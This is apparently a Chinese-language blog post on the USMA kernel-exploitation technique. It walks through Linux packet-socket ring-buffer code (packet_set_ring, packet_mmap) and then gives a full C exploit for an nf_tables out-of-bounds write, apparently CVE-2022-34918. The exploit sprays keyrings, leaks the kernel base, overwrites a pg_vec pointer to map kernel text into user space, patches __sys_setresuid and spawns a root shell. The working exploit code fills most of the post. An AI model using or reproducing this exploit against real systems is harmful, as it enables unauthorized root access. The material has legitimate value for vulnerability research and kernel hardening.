packet socket模块可以让用户在设备驱动层接受和发送raw packets,并且为了加速数据报文的拷贝,它允许用户创建一块与内核态共享的环形缓冲区,其具体实现函数为packet_set_ring

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {

// ......

case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}

// ......
}

这里会根据setopt进入到不同分支,这里选择创建一块用户态与内核态共享的环形缓冲区,即上述case中,最终走到packet_set_ring函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;
// ......
}

上述会走到alloc_pg_vec函数申请pg_vec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;

pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;

for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

这里会根据block_nr来申请对应数量的页,并最终存放在pg_vec中。

然后就是为什么其可以直接代替页表来实现usma,因为其可以直接将页映射到用户态。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

if (vma->vm_pgoff)
return -EINVAL;

mutex_lock(&po->pg_vec_lock);

expected_size = 0;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec) {
expected_size += rb->pg_vec_len
* rb->pg_vec_pages
* PAGE_SIZE;
}
}

if (expected_size == 0)
goto out;

size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;

for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

这里则是通过mmap将其页面映射到用户态的函数,可以看到最终是将page插入到vma中。

1
2
3
4
5
6
7
static int validate_page_before_insert(struct page *page)
{
if (PageAnon(page) || PageSlab(page) || page_has_type(page))
return -EINVAL;
flush_dcache_page(page);
return 0;
}

不过需要注意的是,在插入的过程中会对页面进行检测,检查page是否为匿名页,是否为Slab子系统分配的页,以及page是否含有type,而内存页的type总共有以下四种。

1
2
3
4
#define PG_buddy	0x00000080
#define PG_offline 0x00000100
#define PG_table 0x00000200
#define PG_guard 0x00000400

PG_buddy为伙伴系统中的页,PG_offline为内存交换出去的页,PG_table为用作页表的页,PG_guard为用作内存屏障的页。可以看到如果传入的page为内核代码段的页,以上的检查全都可以绕过。

所以这里可以直接通过溢出修改掉pg_vec中虚拟地址的值为__sys_setresuid函数所在的页,从而直接修改该函数,最终get root shell

综上,exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
// gcc exp.c -o exp -l mnl -l nftnl -w
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <sched.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <err.h>
#include <libmnl/libmnl.h>
#include <libnftnl/chain.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <libnftnl/table.h>
#include <libnftnl/set.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <sched.h>
#include <sys/types.h>
#include <signal.h>
#include <net/if.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/if_packet.h>
#include <linux/ethtool.h>
#include <linux/sockios.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <syscall.h>
#include <mqueue.h>
#include <linux/keyctl.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/mman.h>

#define PAGE_SIZE 0x1000
#define PREFIX_BUF_LEN 0x10
#define RCU_HEAD_LEN 0x10
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16)
#define KEY_PAYLOAD_SIZE (32 + 1 - 24)
#define CORRUPT_SIZE 0x8000
#define SPRAY_KEY_CNT 150
#define FREE_HOLE_STEP 15
#define KMALLOC64_PAGE_CNT ((32 + 8) / 8)
#define PACKET_SPRAY_CNT 0x100
#define PACKET_FENGSHUI_CNT 0x100
#define PACKET_FREE_HOLE_STEP 0x10

struct leak_payload
{
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
uint16_t len;
} __attribute__((packed));

struct write_payload
{
uint8_t prefix[PREFIX_BUF_LEN];
void *pg_vec;
} __attribute__((packed));

void print_hex(char *buf, int size)
{
int i;
puts("======================================");
printf("data :\n");
for (i = 0; i < (size / 8); i++)
{
if (i % 2 == 0)
{
if (i / 2 < 10)
{
printf("%d ", i / 2);
}
else if (i / 2 < 100)
{
printf("%d ", i / 2);
}
else
{
printf("%d", i / 2);
}
}
printf(" %16llx", *(size_t *)(buf + i * 8));
if (i % 2 == 1)
{
printf("\n");
}
}
puts("======================================");
}

void unshare_setup(uid_t uid, gid_t gid)
{
int temp;
char edit[0x100];

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

temp = open("/proc/self/setgroups", O_WRONLY);
write(temp, "deny", strlen("deny"));
close(temp);

temp = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", uid);
write(temp, edit, strlen(edit));
close(temp);

temp = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", gid);
write(temp, edit, strlen(edit));
close(temp);

return;
}

void set_cpu_affinity(int cpu_n, pid_t pid)
{
cpu_set_t set;

CPU_ZERO(&set);
CPU_SET(cpu_n, &set);

if (sched_setaffinity(pid, sizeof(set), &set) < 0)
err(1, "sched_setaffinity");
}

void create_table(struct mnl_socket *nl, const char *name)
{
uint8_t family = NFPROTO_IPV4;
struct nftnl_table *table = nftnl_table_alloc();

nftnl_table_set_str(table, NFTNL_TABLE_NAME, name);
nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

struct nftnl_expr *exprs[128];
int exprid = 0;

char buf[MNL_SOCKET_BUFFER_SIZE * 2];

struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr *nlh;
int table_seq = seq;

nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWTABLE, family, NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_table_nlmsg_build_payload(nlh, table);
mnl_nlmsg_batch_next(batch);
nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL)
{
err(1, "mnl_socket_open");
}

printf("[+] new table %s\n", name);
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0)
{
err(1, "mnl_socket_send");
}
}

void create_set(struct mnl_socket *nl, const char *name, int key_len, int data_len, int data_type, char *table_name, int id)
{
uint8_t family = NFPROTO_IPV4;

struct nftnl_set *set_stable = nftnl_set_alloc();
nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
nftnl_set_set_str(set_stable, NFTNL_SET_NAME, name);
nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, key_len);
nftnl_set_set_u32(set_stable, NFTNL_SET_DATA_LEN, data_len);
nftnl_set_set_u32(set_stable, NFTNL_SET_DATA_TYPE, data_type);
nftnl_set_set_u32(set_stable, NFTNL_SET_FLAGS, NFT_SET_MAP);
nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);
nftnl_set_set_u32(set_stable, NFTNL_SET_ID, id);

struct nftnl_expr *exprs[128];
int exprid = 0;

char buf[MNL_SOCKET_BUFFER_SIZE * 2];

struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr *nlh;

nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWSET, family,
NLM_F_CREATE | NLM_F_ACK, seq++);
nftnl_set_nlmsg_build_payload(nlh, set_stable);
nftnl_set_free(set_stable);
mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL)
{
err(1, "mnl_socket_open");
}

printf("[+] setting stable %s and set\n", name);
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0)
{
err(1, "mnl_socket_send");
}
}

void create_setelem(struct mnl_socket *nl, char *key_buf, int key_len, char *data_buf, int data_len, char *set_name, char *table_name, int id)
{
uint8_t family = NFPROTO_IPV4;

struct nftnl_set *set_stable = nftnl_set_alloc();
nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);
nftnl_set_set_u32(set_stable, NFTNL_SET_ID, id);

struct nftnl_set_elem *element = nftnl_set_elem_alloc();
nftnl_set_elem_set(element, NFTNL_SET_ELEM_KEY, key_buf, key_len);
nftnl_set_elem_set(element, NFTNL_SET_ELEM_DATA, data_buf, data_len);

struct nftnl_set_elem *element2 = nftnl_set_elem_alloc();
int verdict = NFT_CONTINUE;
nftnl_set_elem_set(element2, NFTNL_SET_ELEM_KEY, key_buf, key_len);
nftnl_set_elem_set(element2, NFTNL_SET_ELEM_VERDICT, &verdict, 4);

nftnl_set_elem_add(set_stable, element);
nftnl_set_elem_add(set_stable, element2);

int seq = 0;
char buf[MNL_SOCKET_BUFFER_SIZE * 2];
struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

struct nlmsghdr *nlh;

nlh = nftnl_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWSETELEM, family,
NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK,
seq++);
nftnl_set_elems_nlmsg_build_payload(nlh, set_stable);
nftnl_set_free(set_stable);
mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL)
{
err(1, "mnl_socket_open");
}

printf("[+] setting set_elem down\n");
if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0)
{
err(1, "mnl_socket_send");
}
}

static inline int add_key(const char *type, const char *description, const void *payload, size_t plen, int ringid)
{
return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)
{
return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

void spray_keyring(int *id_buffer, uint32_t spray_size)
{
char key_desc[0x20];
char key_payload[KEY_PAYLOAD_SIZE + 1] = {0};

for (uint32_t i = 0; i < spray_size; i++)
{
snprintf(key_desc, sizeof(key_desc), "spray_key_%d", i);
memset(key_payload, 'A', KEY_PAYLOAD_SIZE);
for (int j = 0; j < 3; j++)
{
id_buffer[i] = add_key("user", key_desc, key_payload, strlen(key_payload),
KEY_SPEC_PROCESS_KEYRING);
if (id_buffer[i] < 0)
usleep(100 * 1000);
else
break;
}

if (id_buffer[i] < 0)
{
printf("add_key %d: %m", i);
exit(0);
}
}
}

int is_keyring_corrupted(int *id_buffer, uint32_t id_buffer_size,
int *corrupted_key_id)
{
uint8_t buffer[CORRUPT_SIZE] = {0};
int32_t keylen;

for (uint32_t i = 0; i < id_buffer_size; i++)
{
if (!id_buffer[i])
continue;

keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, CORRUPT_SIZE, 0);
if (keylen < 0)
err(1, "keyctl: %m");

if (keylen == CORRUPT_SIZE)
{
*corrupted_key_id = id_buffer[i];
return 1;
}
}
return 0;
}

uint64_t get_keyring_leak(int id_buffer)
{
uint8_t *buffer = malloc(CORRUPT_SIZE);
int32_t keylen;

keylen = keyctl(KEYCTL_READ, id_buffer, (long)buffer, CORRUPT_SIZE, 0);
if (keylen < 0)
err(1, "keyctl: %m");

if (keylen == CORRUPT_SIZE)
{
char *ptr = buffer;
ptr += (128 - 24);
while (ptr < (char *)buffer + CORRUPT_SIZE - 128)
{
if ((*(uint64_t *)(ptr + 0x18) == 0x4141414141414141) &&
(*(uint64_t *)(ptr + 8) != 0))
{
puts("find user_key_payload rcu.func!");
return *(uint64_t *)(ptr + 8);
}
ptr += 128;
}
}
return 0;
}

void release_key(int id_buffer)
{
if (id_buffer)
{
if (keyctl(KEYCTL_REVOKE, id_buffer, 0, 0, 0) < 0)
err(1, "keyctl(KEYCTL_REVOKE): %m");
}
}

void release_keys(int *id_buffer, uint32_t id_buffer_size)
{
for (uint32_t i = 0; i < id_buffer_size; i++)
{
release_key(id_buffer[i]);
id_buffer[i] = 0;
}
}

void packet_socket_rx_ring_init(int s, unsigned int block_size,
unsigned int frame_size, unsigned int block_nr,
unsigned int sizeof_priv, unsigned int timeout)
{
int v = TPACKET_V3;
int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
if (rv < 0)
err(1, "setsockopt(PACKET_VERSION): %m");

struct tpacket_req3 req;
memset(&req, 0, sizeof(req));
req.tp_block_size = block_size;
req.tp_frame_size = frame_size;
req.tp_block_nr = block_nr;
req.tp_frame_nr = (block_size * block_nr) / frame_size;
req.tp_retire_blk_tov = timeout;
req.tp_sizeof_priv = sizeof_priv;
req.tp_feature_req_word = 0;

rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (rv < 0)
err(1, "setsockopt(PACKET_RX_RING): %m");
}

int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
unsigned int block_nr, unsigned int sizeof_priv, int timeout)
{
int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (s < 0)
err(1, "socket(AF_PACKET): %m");

packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
sizeof_priv, timeout);

struct sockaddr_ll sa;
memset(&sa, 0, sizeof(sa));
sa.sll_family = PF_PACKET;
sa.sll_protocol = htons(ETH_P_ALL);
sa.sll_ifindex = if_nametoindex("lo");
sa.sll_hatype = 0;
sa.sll_pkttype = 0;
sa.sll_halen = 0;

int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
if (rv < 0)
err(1, "bind(AF_PACKET): %m");

return s;
}

int pagealloc_pad(int count, int size)
{
return packet_socket_setup(size, 2048, count, 0, 100);
}

int main()
{
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
char c;
char writebuf[0x2000];
char buf[0x2000];
struct leak_payload leak_pay;
int id_buffer[SPRAY_KEY_CNT] = {0};
int corrupted_key_id = 0;
uint64_t leak_ptr = 0;
uint64_t kbase = 0;

unshare_setup(getuid(), getgid());
set_cpu_affinity(0, 0);

struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER);
const int leak_setid = 1;
const int write_setid = 2;

create_table(nl, "table");
create_set(nl, "leak", KMALLOC64_KEYLEN, sizeof(struct leak_payload), NFT_DATA_VALUE, "table", leak_setid);
create_set(nl, "write", KMALLOC64_KEYLEN, sizeof(struct write_payload), NFT_DATA_VALUE, "table", write_setid);

printf("spraying user_key_payload ...\n");
spray_keyring(id_buffer, SPRAY_KEY_CNT);

printf("free some key to create holes ...\n");
for (int i = 0; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP)
{
release_key(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
memset(buf, '\0', 0x2000);
leak_pay.len = CORRUPT_SIZE;
create_setelem(nl, buf, KMALLOC64_KEYLEN, &leak_pay, sizeof(struct leak_payload), "leak", "table", leak_setid);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id))
printf("found keyring %d is corrupted!", corrupted_key_id);
else
{
release_keys(id_buffer, SPRAY_KEY_CNT);
err(1, "can't found corrupted keyring ...");
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = 0; i < SPRAY_KEY_CNT; i++)
{
if (id_buffer[i] == corrupted_key_id)
continue;
release_key(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id);
if (!leak_ptr)
{
err(1, "leak rcu.func failed");
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);
kbase = leak_ptr - 0x51b0a0;
printf("leak kbase: 0x%08lx\n", kbase);
if (kbase & 0xFFF)
err(1, "wrong offset!");

int packet_fds[PACKET_SPRAY_CNT] = {0};
int fengshui_fds[PACKET_FENGSHUI_CNT] = {0};

struct write_payload write_pay;
memset(&write_pay, 0, sizeof(struct write_payload));
write_pay.pg_vec = (void *)((kbase + 0xdf530) & ~0xfff);

puts("use raw_packet to fenghsui kmalloc-64 ...");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++)
fengshui_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);

puts("spraying pg_vec in kmalloc-64 ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
{
packet_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("free some pg_vec to create holes ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i += PACKET_FREE_HOLE_STEP)
{
close(packet_fds[i]);
packet_fds[i] = 0;
}

puts("trigger oob write ...");
create_setelem(nl, buf, KMALLOC64_KEYLEN, &write_pay, sizeof(struct write_payload), "write", "table", write_setid);

puts("searching edited page ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
{
if (!packet_fds[i])
continue;

char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);
if (!page || (ssize_t)page < 0)
{
printf("mmap error: %p\n", page);
continue;
}

int j;
for (j = 0x30; j < 0x1000; j++)
{
if (page[j] != 0)
break;
}
// found non-empty page
if (j != 0x1000)
{
puts("found target page!!");
print_hex(page, 0x100);
puts("patching __sys_setresuid jne to jmp ...");
page[(kbase + 0xdf530 + 0xc9) & 0xfff] = 0xeb;

setresuid(0, 0, 0);
system("/bin/sh");
return 0;
}
}

puts("can't found target page");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++)
close(fengshui_fds[i]);
for (int i = 0; i < PACKET_SPRAY_CNT; i++)
close(packet_fds[i]);
}

参考链接:

https://github.com/randorisec/CVE-2022-34918-LPE-PoC

https://tttang.com/archive/1706/

https://vul.360.net/archives/391

 评论
评论插件加载失败
正在加载评论插件
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量